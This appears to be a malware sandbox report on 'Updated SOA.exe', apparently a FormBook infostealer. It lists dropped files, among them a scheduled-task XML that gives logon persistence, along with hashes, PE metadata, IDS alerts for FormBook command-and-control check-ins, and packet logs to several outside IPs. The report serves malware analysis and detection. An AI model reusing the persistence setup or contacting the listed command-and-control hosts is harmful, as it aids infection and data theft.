                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                          C:\Users\user\AppData\Local\Temp\tmp14E0.tmp
                                                                          Process:C:\Users\user\Desktop\Updated SOA.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1644
                                                                          Entropy (8bit):5.191767332740664
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBLtn:cbh47TlNQ//rydbz9I3YODOLNdq3r
                                                                          MD5:A07DA0BE4BD8AC6827721C7831B3233B
                                                                          SHA1:3040A19452B37F7450B83B7F301F10EFCB5D56AB
                                                                          SHA-256:0A8F7CFE0ED600627FA78F139F9E2BDE405D911274BAF4EE50DBA3687575A9E4
                                                                          SHA-512:05A1B572FA6D8A57051C1C72C7B71B14F4C6914D4DD04E51324B69A24FA9760484514A1484D862862DF5838CB7EDDC4393184D9435E210C33715AA50E65A7510
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                          C:\Users\user\AppData\Roaming\oydxFbGhGlh.exe
                                                                          Process:C:\Users\user\Desktop\Updated SOA.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):833024
                                                                          Entropy (8bit):7.497880986313919
                                                                          Encrypted:false
                                                                          SSDEEP:12288:G+vLaFsmtiK5oUZ3Wj+RellamFY42oDSYlIqxRmiBlGQK:Oa+Fo/hFY4JX5RZlZK
                                                                          MD5:08098C5EF23FB87AF19A5ADBDD31324B
                                                                          SHA1:19645FC145FEAA325C5CC765BC873075A0AA7512
                                                                          SHA-256:AB4676FC90E455DA2127126BFBD1FD167328C79EDA83F686EF71DD89266825F5
                                                                          SHA-512:6D2FE361160642DFE88AD06E681931D8CD3929439A30D3C213D60489BE5CD7D2AA1B47D23B57EB60140EB6394369BC5041102552D40A93787C90A9E4E04EA0C8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 24%
                                                                          Reputation:low
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Ha................................. ........@.. .......................@............@.................................@...K.... ....................... ....................................................... ............... ..H............text........ ...................... ..`.sdata..P...........................@....rsrc........ ......................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Roaming\oydxFbGhGlh.exe:Zone.Identifier
                                                                          Process:C:\Users\user\Desktop\Updated SOA.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Reputation:high, very likely benign file
                                                                          Preview: [ZoneTransfer]....ZoneId=0

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.497880986313919
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          File name:Updated SOA.exe
                                                                          File size:833024
                                                                          MD5:08098c5ef23fb87af19a5adbdd31324b
                                                                          SHA1:19645fc145feaa325c5cc765bc873075a0aa7512
                                                                          SHA256:ab4676fc90e455da2127126bfbd1fd167328c79eda83f686ef71dd89266825f5
                                                                          SHA512:6d2fe361160642dfe88ad06e681931d8cd3929439a30d3c213d60489be5cd7d2aa1b47d23b57eb60140eb6394369bc5041102552d40a93787c90a9e4e04ea0c8
                                                                          SSDEEP:12288:G+vLaFsmtiK5oUZ3Wj+RellamFY42oDSYlIqxRmiBlGQK:Oa+Fo/hFY4JX5RZlZK
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ha................................. ........@.. .......................@............@................................

                                                                          File Icon

                                                                          Icon Hash:92809ca6a6929ef2

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x49e88e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                          Time Stamp:0x6148B4F0 [Mon Sep 20 16:21:04 2021 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:v4.0.30319
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x9e8400x4b.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xa20000x2e2f8.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x9c8940x9ca00False0.855337814246data7.74077880888IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                          .sdata0xa00000x500x200False0.083984375data0.371646217526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0xa20000x2e2f80x2e400False0.332648859797data5.94439881376IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0xd20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountry
                                                                          RT_ICON0xa22b00x62a4PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                          RT_ICON0xa85540x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 318767104, next used block 117440512
                                                                          RT_ICON0xb8d7c0x94a8data
                                                                          RT_ICON0xc22240x5488data
                                                                          RT_ICON0xc76ac0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 224, next used block 117440512
                                                                          RT_ICON0xcb8d40x25a8data
                                                                          RT_ICON0xcde7c0x10a8data
                                                                          RT_ICON0xcef240x988data
                                                                          RT_ICON0xcf8ac0x468GLS_BINARY_LSB_FIRST
                                                                          RT_GROUP_ICON0xcfd140x84data
                                                                          RT_VERSION0xcfd980x374data
                                                                          RT_MANIFEST0xd010c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Version Infos

                                                                          DescriptionData
                                                                          Translation0x0000 0x04b0
                                                                          LegalCopyrightCopyright Solymosi Software 2011
                                                                          Assembly Version0.1.3.0
                                                                          InternalNameTypeEnt.exe
                                                                          FileVersion0.1.1.0
                                                                          CompanyNameSolymosi Software
                                                                          LegalTrademarks
                                                                          CommentsDuo Bizz Snake
                                                                          ProductNameDuo Bizz
                                                                          ProductVersion0.1.1.0
                                                                          FileDescriptionDuo Bizz
                                                                          OriginalFilenameTypeEnt.exe

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          09/21/21-02:20:18.215402TCP1201ATTACK-RESPONSES 403 Forbidden804976734.102.136.180192.168.2.3
                                                                          09/21/21-02:20:23.281737TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.3104.21.2.184
                                                                          09/21/21-02:20:23.281737TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.3104.21.2.184
                                                                          09/21/21-02:20:23.281737TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.3104.21.2.184
                                                                          09/21/21-02:20:39.666773TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.3184.168.131.241
                                                                          09/21/21-02:20:39.666773TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.3184.168.131.241
                                                                          09/21/21-02:20:39.666773TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.3184.168.131.241
                                                                          09/21/21-02:20:44.929760TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.3185.53.177.12
                                                                          09/21/21-02:20:44.929760TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.3185.53.177.12
                                                                          09/21/21-02:20:44.929760TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.3185.53.177.12
                                                                          09/21/21-02:20:44.946695TCP1201ATTACK-RESPONSES 403 Forbidden8049771185.53.177.12192.168.2.3
                                                                          09/21/21-02:20:50.413015TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978480192.168.2.3185.33.94.22
                                                                          09/21/21-02:20:50.413015TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978480192.168.2.3185.33.94.22
                                                                          09/21/21-02:20:50.413015TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978480192.168.2.3185.33.94.22
                                                                          09/21/21-02:20:50.462430TCP1201ATTACK-RESPONSES 403 Forbidden8049784185.33.94.22192.168.2.3
                                                                          09/21/21-02:21:11.726536TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980380192.168.2.334.102.136.180
                                                                          09/21/21-02:21:11.726536TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980380192.168.2.334.102.136.180
                                                                          09/21/21-02:21:11.726536TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980380192.168.2.334.102.136.180
                                                                          09/21/21-02:21:11.917900TCP1201ATTACK-RESPONSES 403 Forbidden804980334.102.136.180192.168.2.3

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Sep 21, 2021 02:20:18.008964062 CEST4976780192.168.2.334.102.136.180
                                                                          Sep 21, 2021 02:20:18.047765017 CEST804976734.102.136.180192.168.2.3
                                                                          Sep 21, 2021 02:20:18.047872066 CEST4976780192.168.2.334.102.136.180
                                                                          Sep 21, 2021 02:20:18.048001051 CEST4976780192.168.2.334.102.136.180
                                                                          Sep 21, 2021 02:20:18.112035036 CEST804976734.102.136.180192.168.2.3
                                                                          Sep 21, 2021 02:20:18.215401888 CEST804976734.102.136.180192.168.2.3
                                                                          Sep 21, 2021 02:20:18.215460062 CEST804976734.102.136.180192.168.2.3
                                                                          Sep 21, 2021 02:20:18.215588093 CEST4976780192.168.2.334.102.136.180
                                                                          Sep 21, 2021 02:20:18.215639114 CEST4976780192.168.2.334.102.136.180
                                                                          Sep 21, 2021 02:20:18.240833998 CEST804976734.102.136.180192.168.2.3
                                                                          Sep 21, 2021 02:20:23.261398077 CEST4976880192.168.2.3104.21.2.184
                                                                          Sep 21, 2021 02:20:23.281034946 CEST8049768104.21.2.184192.168.2.3
                                                                          Sep 21, 2021 02:20:23.281212091 CEST4976880192.168.2.3104.21.2.184
                                                                          Sep 21, 2021 02:20:23.281737089 CEST4976880192.168.2.3104.21.2.184
                                                                          Sep 21, 2021 02:20:23.299012899 CEST8049768104.21.2.184192.168.2.3
                                                                          Sep 21, 2021 02:20:23.731086969 CEST8049768104.21.2.184192.168.2.3
                                                                          Sep 21, 2021 02:20:23.731206894 CEST8049768104.21.2.184192.168.2.3
                                                                          Sep 21, 2021 02:20:23.731324911 CEST4976880192.168.2.3104.21.2.184
                                                                          Sep 21, 2021 02:20:23.731369019 CEST4976880192.168.2.3104.21.2.184
                                                                          Sep 21, 2021 02:20:23.748866081 CEST8049768104.21.2.184192.168.2.3
                                                                          Sep 21, 2021 02:20:29.062171936 CEST4976980192.168.2.323.92.26.10
                                                                          Sep 21, 2021 02:20:29.237730980 CEST804976923.92.26.10192.168.2.3
                                                                          Sep 21, 2021 02:20:29.238070965 CEST4976980192.168.2.323.92.26.10
                                                                          Sep 21, 2021 02:20:29.238538980 CEST4976980192.168.2.323.92.26.10
                                                                          Sep 21, 2021 02:20:29.414197922 CEST804976923.92.26.10192.168.2.3
                                                                          Sep 21, 2021 02:20:29.414244890 CEST804976923.92.26.10192.168.2.3
                                                                          Sep 21, 2021 02:20:29.414275885 CEST804976923.92.26.10192.168.2.3
                                                                          Sep 21, 2021 02:20:29.414541960 CEST4976980192.168.2.323.92.26.10
                                                                          Sep 21, 2021 02:20:29.414644957 CEST4976980192.168.2.323.92.26.10
                                                                          Sep 21, 2021 02:20:29.589292049 CEST804976923.92.26.10192.168.2.3
                                                                          Sep 21, 2021 02:20:39.495207071 CEST4977080192.168.2.3184.168.131.241
                                                                          Sep 21, 2021 02:20:39.666296959 CEST8049770184.168.131.241192.168.2.3
                                                                          Sep 21, 2021 02:20:39.666444063 CEST4977080192.168.2.3184.168.131.241
                                                                          Sep 21, 2021 02:20:39.666773081 CEST4977080192.168.2.3184.168.131.241
                                                                          Sep 21, 2021 02:20:39.837649107 CEST8049770184.168.131.241192.168.2.3
                                                                          Sep 21, 2021 02:20:39.861923933 CEST8049770184.168.131.241192.168.2.3
                                                                          Sep 21, 2021 02:20:39.861970901 CEST8049770184.168.131.241192.168.2.3
                                                                          Sep 21, 2021 02:20:39.862287998 CEST4977080192.168.2.3184.168.131.241
                                                                          Sep 21, 2021 02:20:39.862422943 CEST4977080192.168.2.3184.168.131.241
                                                                          Sep 21, 2021 02:20:40.033267021 CEST8049770184.168.131.241192.168.2.3
                                                                          Sep 21, 2021 02:20:44.895415068 CEST4977180192.168.2.3185.53.177.12
                                                                          Sep 21, 2021 02:20:44.912771940 CEST8049771185.53.177.12192.168.2.3
                                                                          Sep 21, 2021 02:20:44.912903070 CEST4977180192.168.2.3185.53.177.12
                                                                          Sep 21, 2021 02:20:44.929626942 CEST8049771185.53.177.12192.168.2.3
                                                                          Sep 21, 2021 02:20:44.929759979 CEST4977180192.168.2.3185.53.177.12
                                                                          Sep 21, 2021 02:20:44.946661949 CEST8049771185.53.177.12192.168.2.3
                                                                          Sep 21, 2021 02:20:44.946695089 CEST8049771185.53.177.12192.168.2.3
                                                                          Sep 21, 2021 02:20:44.946712971 CEST8049771185.53.177.12192.168.2.3
                                                                          Sep 21, 2021 02:20:44.946875095 CEST4977180192.168.2.3185.53.177.12
                                                                          Sep 21, 2021 02:20:44.946928024 CEST4977180192.168.2.3185.53.177.12
                                                                          Sep 21, 2021 02:20:44.964370012 CEST8049771185.53.177.12192.168.2.3
                                                                          Sep 21, 2021 02:20:50.394264936 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.412487030 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.412758112 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.413014889 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.430296898 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462430000 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462472916 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462511063 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462555885 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462614059 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462650061 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462650061 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.462690115 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462692976 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.462728024 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462728024 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.462776899 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462779999 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.462810040 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462836027 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462862015 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462897062 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.462913036 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.462949991 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:55.532609940 CEST4980180192.168.2.3172.67.169.11
                                                                          Sep 21, 2021 02:20:55.550123930 CEST8049801172.67.169.11192.168.2.3
                                                                          Sep 21, 2021 02:20:55.550256014 CEST4980180192.168.2.3172.67.169.11
                                                                          Sep 21, 2021 02:20:55.550383091 CEST4980180192.168.2.3172.67.169.11
                                                                          Sep 21, 2021 02:20:55.567588091 CEST8049801172.67.169.11192.168.2.3
                                                                          Sep 21, 2021 02:20:55.697921038 CEST8049801172.67.169.11192.168.2.3
                                                                          Sep 21, 2021 02:20:55.697942972 CEST8049801172.67.169.11192.168.2.3
                                                                          Sep 21, 2021 02:20:55.698059082 CEST8049801172.67.169.11192.168.2.3
                                                                          Sep 21, 2021 02:20:55.698138952 CEST4980180192.168.2.3172.67.169.11
                                                                          Sep 21, 2021 02:20:55.698189974 CEST4980180192.168.2.3172.67.169.11
                                                                          Sep 21, 2021 02:20:55.698249102 CEST4980180192.168.2.3172.67.169.11
                                                                          Sep 21, 2021 02:21:05.995961905 CEST4980280192.168.2.370.40.216.229
                                                                          Sep 21, 2021 02:21:06.154270887 CEST804980270.40.216.229192.168.2.3
                                                                          Sep 21, 2021 02:21:06.154429913 CEST4980280192.168.2.370.40.216.229
                                                                          Sep 21, 2021 02:21:06.154762030 CEST4980280192.168.2.370.40.216.229
                                                                          Sep 21, 2021 02:21:06.312954903 CEST804980270.40.216.229192.168.2.3
                                                                          Sep 21, 2021 02:21:06.648921967 CEST4980280192.168.2.370.40.216.229
                                                                          Sep 21, 2021 02:21:06.848128080 CEST804980270.40.216.229192.168.2.3
                                                                          Sep 21, 2021 02:21:07.205437899 CEST804980270.40.216.229192.168.2.3
                                                                          Sep 21, 2021 02:21:07.205759048 CEST4980280192.168.2.370.40.216.229
                                                                          Sep 21, 2021 02:21:07.205770969 CEST804980270.40.216.229192.168.2.3
                                                                          Sep 21, 2021 02:21:07.205905914 CEST4980280192.168.2.370.40.216.229
                                                                          Sep 21, 2021 02:21:11.701520920 CEST4980380192.168.2.334.102.136.180
                                                                          Sep 21, 2021 02:21:11.726345062 CEST804980334.102.136.180192.168.2.3
                                                                          Sep 21, 2021 02:21:11.726453066 CEST4980380192.168.2.334.102.136.180
                                                                          Sep 21, 2021 02:21:11.726536036 CEST4980380192.168.2.334.102.136.180
                                                                          Sep 21, 2021 02:21:11.751239061 CEST804980334.102.136.180192.168.2.3
                                                                          Sep 21, 2021 02:21:11.917900085 CEST804980334.102.136.180192.168.2.3
                                                                          Sep 21, 2021 02:21:11.917968988 CEST804980334.102.136.180192.168.2.3
                                                                          Sep 21, 2021 02:21:11.918134928 CEST4980380192.168.2.334.102.136.180
                                                                          Sep 21, 2021 02:21:11.943341017 CEST804980334.102.136.180192.168.2.3

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Sep 21, 2021 02:19:00.027734995 CEST4919953192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:19:00.049324036 CEST53491998.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:19:28.719286919 CEST5062053192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:19:28.746606112 CEST53506208.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:19:32.248549938 CEST6493853192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:19:32.289798021 CEST53649388.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:19:50.758531094 CEST6015253192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:19:50.786909103 CEST53601528.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:20:07.744827986 CEST5754453192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:20:07.773701906 CEST53575448.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:20:07.820481062 CEST5598453192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:20:07.848467112 CEST53559848.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:20:11.705379963 CEST6418553192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:20:11.771476984 CEST53641858.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:20:17.970813036 CEST6511053192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:20:18.003947973 CEST53651108.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:20:23.232652903 CEST5836153192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:20:23.258923054 CEST53583618.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:20:28.748796940 CEST6349253192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:20:29.059885979 CEST53634928.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:20:39.469809055 CEST6083153192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:20:39.494118929 CEST53608318.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:20:44.869060993 CEST6010053192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:20:44.894406080 CEST53601008.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:20:46.517965078 CEST5319553192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:20:46.554338932 CEST53531958.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:20:47.445538998 CEST5014153192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:20:47.481482029 CEST53501418.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:20:49.968334913 CEST5302353192.168.2.38.8.8.8
